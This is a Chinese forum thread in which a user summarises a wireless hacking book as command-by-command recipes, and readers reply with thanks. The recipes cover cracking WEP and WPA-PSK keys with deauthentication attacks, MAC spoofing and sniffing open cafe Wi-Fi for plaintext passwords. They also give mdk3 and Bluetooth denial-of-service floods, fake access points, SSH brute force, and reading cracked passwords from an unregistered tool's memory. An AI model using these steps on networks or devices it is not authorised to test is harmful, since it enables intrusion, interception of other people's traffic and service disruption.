搜索
xcloud 如意云
查看: 7688|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

29

主题

0

听众

3661

积分

少校

Rank: 5

签到天数: 11 天

[LV.3]偶尔看看II

UID
66587
帖子
1338
威望
7
荣誉
6
金币
2185 元
最后登录
2014-4-22
注册时间
2008-11-14
在线时间
427 小时

灌水天才

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。+ ]0 Y+ |& h- T8 ?7 B% u

3 _+ }7 @$ }  Y7 y1 q- D8 v以下所有操作均在BackTrack 4中进行。* h3 H( t* C) a
7 U  I4 H9 _5 I8 r5 N; m7 M. C

' d4 k- K" ?- v1 [无线WEP加密P解:
5 W/ F* T# M) ^3 u7 m0 M% q" Q" t2 `2 _. O; X- F9 O
注入P解:
9 I1 K8 e6 E) m& t9 H7 w7 z" K4 y$ O3 ?( @
ifconfig2 ?2 J0 J$ H  M, X  ~+ C) b) {

4 }) _! i( s7 r5 k6 {; k6 N' {; Lifconfig –a
4 a; [  J% W, D1 }2 _* Y
( ^' D, o% V  W3 D9 Iifconfig wlan0(无线网卡) up
8 A# R' x2 Z9 S% S7 ]. [6 E! Z
% d% o0 L( F$ {1 Y" tairmon-ng start wlan0; ^: j# a$ ?* j' q; W" S

  K' Q9 S' Y9 h/ B; s" Kairodump-ng mon00 J  o9 }* C, D: m4 X. q( r

  w! E( E. V/ F) h) P0 P% N7 V0 Mairodump-ng --ivs –w ivsfile –c 频道 mon0或. \" Q6 S" j- t3 }
# Q6 P' ^4 }8 P; z! n* T1 r
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon06 Y: k4 X+ v; h* b1 @. T

: X: c* Q8 j% l0 }  Z- Baireplay-ng -3 –b BSSID –h Station mon0# W- h. H5 i( a
6 n5 |  D* q" G# v* B, h
aircrack-ng ivsfile-01.ivs7 b' m2 w/ w, L+ d; \& _
* z- Y1 ^6 o8 x/ m
虚连接P解(适用于无客户端连接APP解)3 B' J! h+ y1 |. X
+ I: }& d5 X. \. I
ifconfig
- ?* u9 O' X( N+ W" T! U6 p1 J7 @0 h7 u8 i- t% Q, A1 k/ D$ b
ifconfig –a7 _5 [# V9 n( b$ [8 b
/ X3 u8 q8 b- f8 R+ A* |
ifconfig wlan0(无线网卡) up* f- A+ Y0 d( l) ]

. `) p( y! M3 uairmon-ng start wlan0
' W: [; X( P8 e: i) R7 C: e7 q7 X" |2 x5 U! d
airodump-ng mon0
/ t# w" M- `( K6 Q6 g- U- w0 _' X! l* b0 v& K! u3 X7 D+ T) J7 ]
airodump-ng --ivs –w ivsfile –c 频道 mon0或
  D2 u: e( j: f: Y- L  l# O0 {
# S" ~8 `0 Q2 D- eairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0* _1 U7 P- \4 A8 L% y- R

" d0 }4 W! F* F3 zaireplay-ng -1 0 –e SSID –a BSSID –c Station mon05 w: D. d6 X& D# X0 U2 ~, j
9 l! j- E% F, }8 X' Z) k0 J+ T( f  u+ y
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0: O& G  F2 p; v! \
; J1 l  c$ Y! y
aircrack-ng ivsfile-01.ivs% v- }. T7 ~5 K* \9 z1 f
" H/ w& ~% [% t
5 x) G& N" O8 A
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。. }7 l9 ]. o) F" u, G( n- S5 K+ j

, a$ _+ R* ]: L+ g1 a8 V" E
2 T) J' n9 A: [! s& [WPA-PSKP解
, K! H. C3 a/ A' a$ a+ e7 f5 J8 k  M: E. l" J  \
ifconfig9 ?* \8 z8 O! H9 K5 _3 d

8 e/ ~# g5 Z: G. oifconfig –a  u. S9 Q% a0 l5 k8 \

6 t% u7 g& |8 H* zifconfig wlan0(无线网卡) up6 v7 ?5 _* x  d% V% ~" U9 u

  Y0 q+ r4 @9 {$ S! p; d* y  E* C! Hairmon-ng start wlan0+ u: J1 i0 N; b- j9 Y' d
0 G. d; `# `8 D, D5 o
airodump-ng mon0
* q: J6 i& Z) ]) b' v% {- o6 F! B, N( `% X
airodump-ng –w capfile –c 频道 mon05 C" D" p2 g5 Q) p
. q- s7 D( z: q& ?
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
; y- `9 |9 C) o4 v. k1 U; o0 z3 W: ]" i& Y# ^" r7 _
aircrack-ng –w Dic capfile-01.cap或
8 \; h( B6 k3 N, p# R- m5 X3 h, A4 |, J" P$ ?3 i; c
cowpatty –f Dic –r capfile-01.cap –s SSID
) u$ \: j" l/ a2 r) V
$ r8 F- T/ D! W/ K; F" B/ x( Lcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID4 r( A* F* y2 g/ ]: k- Q
9 Y: i/ b  D0 \3 l! Q" [
傻瓜式P解软件SpoonWPA。/ r. L2 X" n0 H  I

3 \5 J- q+ K& Q$ C7 T1 uBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst4 D; ?6 S, K- p

4 d6 |8 j. ?9 ]. [: @5 |; H5 j: N. t# \* N& V# _' E9 c) D' r
字典文件的生成和上传2 z; h5 Y7 `7 J9 ?0 |. o- G& G* R6 g
4 J; D! B4 F5 |
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
1 h7 Z$ I! G! J* J  ]3 I  U/ s. ~0 H4 p6 `' p5 u/ h

# C6 c) Z" R: T5 ]0 y# s, aBT4下开启Tftp:Services—TFTPD—start TFTPD5 j% ~. S4 }: |7 I; }

2 J  D7 X1 X! {- K2 X" c9 M在Windows的CMD中运行 tftp –i IP put **.dic; W, P8 Z9 e. {( o  F' y

8 Y! {; f5 j5 L" j% n% B7 x1 n2 h4 B
BT4下开启SSH:Services—SSH—start SSH; Z# v7 D; L2 f1 _3 u# ~7 H' H* C

$ }# ?" W: T+ Z2 mWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root5 z: G. |  K7 p! l( r/ o

# ]7 K+ e1 w- H) S: C& ~6 B
- B/ K, s1 Y: o" K) ^: `9 H$ |AP限制MAC时的解决
3 V7 v7 Q4 j. w' I3 K6 }) X1 l' e# `% O: V
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:5 K+ r0 A' b, w3 Z, r

. |) ^/ [* m& Z& A8 Vifconfig wlan0 hw ether NewMAC
3 U" ~8 B' v* ?9 Z5 Y
6 B( G' e0 [0 d0 M3 J- O3 z
$ Y/ f/ c' \1 t' v关闭SSID广播的AP探测:" [! Z* f4 ~5 r" z4 \1 @& g3 s/ U( H0 E
# |# I: A# Y/ t% h6 A/ J4 S0 U
1.     Deauth攻击:+ F! _6 b+ e8 T$ d
! c1 h2 d& b6 k
airodump-ng mon00 w3 X8 k) h& D* X3 o; q) o

* h: q* X1 L$ ~- B& f: c0 zaireplay-ng -0 10 –a BSSID –h Station mon0
0 ~' A3 ~# U; R  a3 ?$ D5 _7 R- L+ `
2.     抓包分析' o- M$ ]: O2 l' U

& q, {; h& z/ G' ]& c& A) dOmnipeek% Q( h( K" g  X6 d; w& {

+ B6 k6 M1 D( u) s4 c- j' F3 J' gTcpdump –n –e –vvv –i 网卡名
( R, y6 m8 S& S/ I/ _
$ R6 {4 O: a( T* B, k3.     暴力P解
' x2 T+ M# t4 x2 U# E
" [7 w, A  r3 h; M7 `8 hCharon 1.1暴力P解" V! V1 |+ o+ O, G5 Y$ M0 k' c3 l

6 h' z1 B) c; s/ D  M- ?6 L7 k
无线加密数据包的解密, E( e! M7 n) @" e2 J
0 |: b2 @7 I' N7 m

* X4 ^* ?! b$ [4 c使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
8 d" ~* y; ?' h  L8 C# p" F( n) Z' u5 G) E7 C. G$ Q' Q  J% E* O+ N6 e
FilterNS     DNS解析数据包% p8 |* q+ }, {3 U( D! }4 ?; z
! L7 `; W9 ?; U! y+ z5 u- G  t  c
Filter:HTTP    WEB访问数据包
  i2 J" q' j6 [% M0 q
8 J% k) V# F5 `7 Q4 ]; _+ |Filter:msnms   MSN' N6 T* Y" I7 Z7 \1 O
# m/ u- f- H) Z, o6 I1 p
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
0 `2 ?7 }; J2 J7 C
3 h' j# M6 f5 }! ^使用airdecap-ng解密:" p2 B; r: p* }4 U& S7 ^
7 b8 o! K8 O; q% D4 X
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
! I) I& f3 Z& Q0 f) M4 g0 U
: }7 p8 }" n' v& V, n6 z+ c) H  [& W3 p6 c4 L: C  u  c6 `) ^
咖啡馆中无线数据截取(开放式无加密AP)0 I, B1 i9 u8 Y6 u2 ^3 |% {, u

' p+ e2 s, Q1 l" ~4 ^6 ]$ b1.Airodump-ng –w data –c频道 mon04 z; v  |  C7 J1 g! [% ~* }
1 o6 [: A. i7 X" s" h5 B* c
2.使用WireShark打开分析, F1 }3 u/ D5 _- U3 h) v  r) t

& {" p; ~9 M0 |( j' j) b1 E8 e
! V8 e  ], l" a: U; H9 P3 R3 [7 ZBT4下的渗透工具:% X( L9 w! b7 J9 l4 D* s7 c

0 g; N- C. U  Fnmap –sP IP/24        判断C段下存活的主机 9 ~: D2 [5 ]5 {: v6 g! u5 _2 m

4 ?0 d7 r# i3 B" Nnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放  h3 t4 o- c  c) J) D6 ?- h2 W7 m
8 O- {+ O% m$ N  D' v
nmap –vv –sV IP –p port   指定端口的详细信息。。。  |! V/ |6 h( s( p8 o. ]
+ y+ m  R. k. W! M% L) e8 ^9 |: g/ o
namp –O IP/24    判断主机的系统版本
2 U9 t1 s( ^$ o; ]) O2 r
* o& F9 C9 y; S8 w$ G6 l
! [( T" P" K4 w/ O4 @GUI 版nmap:Zenmap 0 M) n4 ^+ I* T/ ~

( @, b: @; F% k6 z- z
' T5 i+ \/ r2 b1 F& i/ ~Amap使用:amap –B IP port
  [& E; B" t( I, q+ f. i# z9 v' S) L) j! R8 W) u# Q
Nbtscan(扫描Windows网络NetBios信息):
7 Q! }/ `" V1 {+ k" c+ W  }3 m3 p$ t
9 C; b; E2 \1 X+ Q0 o7 `nbtscan –v –s : IP/24
/ P" D- @  F% O$ P$ A6 \/ V+ i) z0 E
6 q0 r5 A0 k7 F$ w, Nnbtscan –r IP$ `- r; f8 a" ^# t, I2 w! y

' q0 f) T' S, n0 x, P7 H' }6 T
( [: z% Y. F# M' D/ H& o9 \3 Q& B* n* _% rDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
/ f2 h0 C* d. X3 z, y# Y6 Q
6 A9 n' ~/ m' U3 C( Q' g! ]  `; ^- o) i, j0 N! r% R* R! i: t) l
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
* k$ v6 e/ a9 K+ r- V
/ T$ ~9 w/ ?+ z# {BruteSSH: ./bruthe.py –h IP –u Username –d Dic3 S' ]) v- n7 ]$ d1 W- A9 U6 L

7 R3 O0 Q, B0 y/ H% GMetasploit3使用
! C6 v* h6 L8 G" I/ d无线D.0.S
! w7 ?0 K+ K: C  x! [+ X
; O. Z9 V" R" g+ O" h5 S) [. H* K; y1 [4 H
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击); G# @6 W0 B0 U: c( O$ {1 W- |

% h, `" t. ]/ D& `airmon-ng start wlan0- |4 C! e/ Q2 a9 L7 W
, o7 }* l1 K# b. V( N
airodump-ng mon00 Y* M. Z3 n7 T
' _7 \2 `* m7 I' d/ k
mdk3 mon0 a –a BSSID
! @. K' r6 y: a% O. X
" s( O% N" t' l0 i对所有的AP攻击:mdk3 mon0 a/ j6 R* Y; P% R2 v' P9 D2 d

% A+ `) z( D5 k
6 ^, A, `* D) i- n* x* p, i% ?Deauth Flood 攻击+ ~5 y9 n. I5 X( @0 X, _2 H# P

# s: [# t% g# |' |5 hmdk3 mon0 d –c Channel
0 [( i: W$ S" p, |1 u' W+ O, c
, d2 z$ Y: Q( h9 b* K. H" h图形化D.O.S攻击:Charon
: b/ ]- U) q( x3 }! V* P
; p0 c3 N2 I! `9 `; ?
* K/ u8 x) t) X! r+ ?* _+ \当受到攻击时,使用Wireshark抓包可以看到异常信息。
3 O" q" e8 c1 M& d4 D  o: L' C) z$ i$ {1 |' C! @9 d
. n2 L8 n6 J, Y: o, |5 Q9 s
WPA-PSK高速P解
* F* V5 E% t* e: M. X2 j0 C9 q$ A0 R( G7 P' ^2 Y
1.       WPA-PSK PMK Hash TablesP解
  M/ j3 [9 d3 J5 \% m5 z& a
+ H7 T- c$ h, |3 i9 fCowpatty –d HashTable.hash –r ***.cap –s SSID
( G0 o( i# U1 A/ `* v) \' G
5 w2 m7 R2 q2 S- o5 k, @" R8 RHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID; `# S( B3 j7 e) F
$ O+ @3 ^/ t5 }, g) f5 ?
2.       GPU辅助高速P解
- @% R' \# L( w) c4 t$ q( k6 F( X" y  _1 l& b5 H  E
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
) g/ a' q2 B; q' T: _% c/ _% O! ]3 o; X. `
3.       分布式P解
  K5 L) R+ \) @0 g. l* p7 Y5 I9 n7 ^! o' A  h$ x6 b* |

  E: V9 j& b0 x6 ^! \" V8 fAP的伪造! y2 E/ F6 _( A! z. a" g

+ H3 _1 v  K! i" k6 D把AP的MAC改成目标AP的MAC
; B2 [& S6 G3 T
8 q4 R6 _. W. a) E" O+ H2 Q$ G, T网卡软AP# J( Z& v8 e2 ?- x( B8 p" E
  ^  `9 J8 `( g* }  @7 [) L

& n  V; D/ k# i' R, C$ n# i伪造大量虚假AP信号:( @2 i+ G% v5 \( A$ J

' G- n5 S. v' s' Z随机SSID:mdk3 mon0 b –g –c 频道
" d) k4 P3 ?% |" c* \/ _
5 h3 H8 ]; e) h* H; X4 j指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度( p5 u* A9 F  D+ ?

0 @. K5 t" r# Q) [( l: _* f( _" q! j' G- k/ ?/ s* v) E
War-Driving) S- X& J2 J% Q, t$ t$ G& f# v
2 R& ~0 k' m  g
热点地图绘制
. J( P" u8 P, W' H; N7 U2 v+ L3 _" j2 I
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。, _3 o! ?: U" U; C7 h) f( b# r

! K  w* L" [0 D; W. K9 p( K7 ^9 `1 ?$ F
Netstumble/ _/ g* B5 t0 h0 _
5 l+ }6 ~* d+ s

  Z7 J5 l6 P3 w- H蓝牙Hacking
! B+ _* m, H& p& m$ ?* z$ l, c' \
Windows下的Blue Soleil工具
/ R3 {  z& J) Z! b1 S% n9 v
7 e0 z5 G  i& U5 F8 v" pBT4:
+ N. D' Q) j7 H1 |) t
8 i1 q% i7 y* g$ m- {& mhciconfig 查看蓝牙适配器
  ]/ b$ m1 l7 s. r" x2 ^# O. \3 q4 m' q. k0 W
hciconfig hci0 up 载入蓝牙适配器1 U. {/ U3 S% T

. `1 k& M: q& Hhciconfig hci0 class 蓝牙适配器详细信息7 p0 f+ K- B9 u5 A8 s
: V6 ?# B  ^/ {1 n0 A
. @4 _2 f( Z2 O+ F" ^) ]; z) Z
hcitool(扫描蓝牙)# z% J! p$ z1 l1 q

1 T3 w8 y5 u7 h& ~0 i$ P1 hhcitool –i hci0 scan  O2 T. W2 h. q- a# S% S
, |+ N, L% b7 c% R( G' W7 d) [
BTscanner(扫描蓝牙): Y/ U; a0 F* \& O( J( @
9 r3 l$ R; Q3 `

2 c& [6 b7 w( N. K# [1 x蓝牙攻击:
& d+ e7 d+ w/ `5 S: o. l
" o! v2 u7 y& N; w6 _2 |9 mBlueBugging (适用于BlueTooth V1.1的手机)
$ ^8 Y- }4 }( w$ p5 P% P7 M- L
/ [( S' Q( s/ ~+ qBluebugger工具:+ Y1 R* L5 B( f6 q

  n* q. K6 E* F1 y/ i' GBulebugger –a HD_Addr info% f. E! E% x% N
- F8 K* H4 o3 \! Y. x5 [

$ a" S2 G4 w& K* q2 Z5 H& fBlueJacking
9 P2 ?1 R1 ?* h- k; S! W) Q) y* {& l
* \; h1 W* W/ k6 `; l) J. k实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。- W( x2 v" j8 F3 V  g( E0 Q( O
* i+ G0 L8 k3 B! V: ]9 [2 \

5 w! H5 V% T( Y+ {9 FHD_Addr修改:
$ U9 Y8 H9 {0 _9 B, I4 G2 f
) a  n, }9 f& R3 P" U; s/ @Bdaddr工具
( M  W7 ~4 W* u7 I
# h' a0 y! ~- X" Mbdaddr –i 蓝牙设备名 新HD_addr
" D# O& t$ q" K2 p2 B' u4 I
" M; l6 y5 p" Z3 @$ ]  m. u  A- k8 u. i& Z# y2 ^
蓝牙D.O.S0 T( h& l  ?5 o* N; [3 m. s/ e

5 g) \' j9 J3 El2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
9 B7 }- @# {- i5 j& s
; Z! s1 _; r. Rhciconfig
  u3 U2 h: V; ~; ^. b, _: `% w
- b$ q9 k- \7 o/ a. K7 T- G1 `hciconfig hci0 up: Q: ^7 i3 I; l1 I

* a4 W7 ~0 U  {/ r- [hcitool –i hci0 scan
+ f2 B% x8 ^7 ?( G& T8 v& x+ I( L* Q9 \! L! A
l2ping –s 10000 –目标MAC
! W7 C5 P# {% @# w! @
) t; w6 E' ~8 V1 A, b, t
; \( U) P3 W. A( T不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
( y6 ?7 I! O" O5 [. a* ]) i9 G* Z
- F% V$ M' q5 P6 C1 Y5 w% B./fang –r ************-############ -s
) \, M4 c# ]7 i- E8 z" _- p, _
暴力P解************-############的蓝牙设备
1 M4 X* C, u  o8 Q/ W& x0 O; u) ^7 U, |. X* [4 _. J3 I' U
./fang –l 各厂商BD_Addr分配( O  r4 k7 |9 ~
- j9 d3 U1 P2 o2 Q/ T; w

! h+ o; o: E9 {2 J+ e2 A' w) BWifiZoo使用
6 v7 X4 J# r+ T( X' L! s' t' n& b1 e% u. u3 S2 t& p+ Y$ @
./wifizoo.py –c Capfile
/ r* |  @, ?' F. Z! ?
- J6 k8 x( W" N: k( C' ~/ `访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情
2

查看全部评分

5

主题

0

听众

880

积分

中尉

Rank: 3Rank: 3Rank: 3

该用户从未签到

UID
177172
帖子
182
威望
0
荣誉
0
金币
648 元
最后登录
2010-8-13
注册时间
2009-10-19
在线时间
49 小时
发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
http://tlwxs.wanye68.com/ 欢迎光临
回复

使用道具 举报

0

主题

0

听众

149

积分

上等兵

Rank: 1

该用户从未签到

UID
73201
帖子
56
威望
0
荣誉
0
金币
82 元
最后登录
2010-8-23
注册时间
2008-12-18
在线时间
9 小时
发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

15

主题

1

听众

2265

积分

少校

Rank: 5

签到天数: 2 天

[LV.1]初来乍到

UID
131983
帖子
391
威望
8
荣誉
0
金币
1823 元
最后登录
2013-6-20
注册时间
2009-7-5
在线时间
113 小时
发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

5

主题

0

听众

1128

积分

上尉

Rank: 4Rank: 4Rank: 4Rank: 4

该用户从未签到

UID
220541
帖子
549
威望
0
荣誉
0
金币
500 元
最后登录
2011-10-13
注册时间
2010-1-28
在线时间
20 小时
发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

0

主题

0

听众

251

积分

少尉

Rank: 2Rank: 2

该用户从未签到

UID
225826
帖子
114
威望
2
荣誉
0
金币
121 元
最后登录
2013-6-16
注册时间
2010-2-6
在线时间
56 小时
发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

1

主题

0

听众

760

积分

中尉

Rank: 3Rank: 3Rank: 3

该用户从未签到

UID
33225
帖子
71
威望
0
荣誉
0
金币
685 元
最后登录
2013-6-24
注册时间
2008-3-8
在线时间
36 小时
发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

7

主题

0

听众

678

积分

中尉

Rank: 3Rank: 3Rank: 3

该用户从未签到

UID
231470
帖子
268
威望
4
荣誉
0
金币
355 元
最后登录
2014-4-16
注册时间
2010-2-20
在线时间
350 小时
发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

0

主题

0

听众

107

积分

上等兵

Rank: 1

该用户从未签到

UID
218547
帖子
57
威望
0
荣誉
0
金币
28 元
最后登录
2010-2-26
注册时间
2010-1-25
在线时间
13 小时
发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。, M( [& B$ J- n% f
借来看看。
回复

使用道具 举报

1

主题

0

听众

156

积分

上等兵

Rank: 1

该用户从未签到

UID
130083
帖子
55
威望
0
荣誉
0
金币
99 元
最后登录
2014-2-24
注册时间
2009-6-29
在线时间
18 小时
发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
- n/ k! _/ m& Y; }呵呵 其实也不贵 21块 快递再一点- }% K; E+ i/ B( c
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

4

主题

0

听众

487

积分

少尉

Rank: 2Rank: 2

该用户从未签到

UID
212234
帖子
298
威望
1
荣誉
0
金币
130 元
最后登录
2012-6-15
注册时间
2010-1-14
在线时间
105 小时
发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

0

主题

0

听众

167

积分

上等兵

Rank: 1

该用户从未签到

UID
234486
帖子
23
威望
0
荣誉
0
金币
133 元
最后登录
2011-8-28
注册时间
2010-2-25
在线时间
7 小时
发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 成为会员

手机版|Archiver| 中国无线门户 ( 粤ICP备11076993 )     免责声明

GMT+8, 2014-4-23 17:15 , Processed in 0.165650 second(s), 34 queries , Gzip On.

Powered by Discuz! X2.5

© 2003-2013 广州威思信息科技有限公司

回顶部